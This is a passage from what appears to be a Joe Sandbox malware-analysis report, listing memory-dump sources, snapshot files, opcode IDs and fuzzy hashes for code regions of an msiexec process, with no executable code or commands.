                                                                                                                                                            • Instruction Fuzzy Hash: EFA10370D00218CFEB10DFA9C944B9DBBB1FF88314F2482A9D508AB3A5DB759985CF55
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4a4bc9df993ed8ac5d67412c51a333fdd57d14b68e7d8c50bb23180dff3e68b4
                                                                                                                                                            • Instruction ID: 5ef12bb30f0a742f5f01b9b9cf87c1c6e14a5305895f20f14c41ddd026aaa770
                                                                                                                                                            • Opcode Fuzzy Hash: 4a4bc9df993ed8ac5d67412c51a333fdd57d14b68e7d8c50bb23180dff3e68b4
                                                                                                                                                            • Instruction Fuzzy Hash: 6591F374D00218CFEB10DFA8C948B9CBBB1FF49310F208299D519AB2A5DB7599C5CF55
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4530d4f1be587b8777941b64ce3863e077c6b803f745591c544dfe8f36907050
                                                                                                                                                            • Instruction ID: aab67a89be8d0b1b1deac104a78993bb8592036b5a40d5c576e8382981430637
                                                                                                                                                            • Opcode Fuzzy Hash: 4530d4f1be587b8777941b64ce3863e077c6b803f745591c544dfe8f36907050
                                                                                                                                                            • Instruction Fuzzy Hash: F2A1AD74A05228CFDB64DF24C894B9ABBB2BF8A301F1085EAD409A7354DB359EC1CF51
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4ee91193e3372103ce1767e6e684793f231da0f4aac95ab946e2427870917235
                                                                                                                                                            • Instruction ID: 3f479423d15e79e06d6a7b056f3f1d5c601fc66871318b2099a47c724e3e86c4
                                                                                                                                                            • Opcode Fuzzy Hash: 4ee91193e3372103ce1767e6e684793f231da0f4aac95ab946e2427870917235
                                                                                                                                                            • Instruction Fuzzy Hash: 3D519274A01228CFCB69DF24C854B9AB7B2BF4A341F5095EAD409A7354CB35AE81CF50
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: \;q$\;q$\;q$\;q
                                                                                                                                                            • API String ID: 0-2933265366
                                                                                                                                                            • Opcode ID: ec6cb30027de1acbfe3cc3cb7bd6f3b3b15301ca65acde66cdeffb6ff1c71411
                                                                                                                                                            • Instruction ID: f202dff5a9d3ec7c98183cc5a15767f3659a60dd1b0278c843f7286dadac7f6e
                                                                                                                                                            • Opcode Fuzzy Hash: ec6cb30027de1acbfe3cc3cb7bd6f3b3b15301ca65acde66cdeffb6ff1c71411
                                                                                                                                                            • Instruction Fuzzy Hash: 5E018431701119AFC765CA2DC480A29F7EEAF8A76472945ABE806CB370DE72EC418750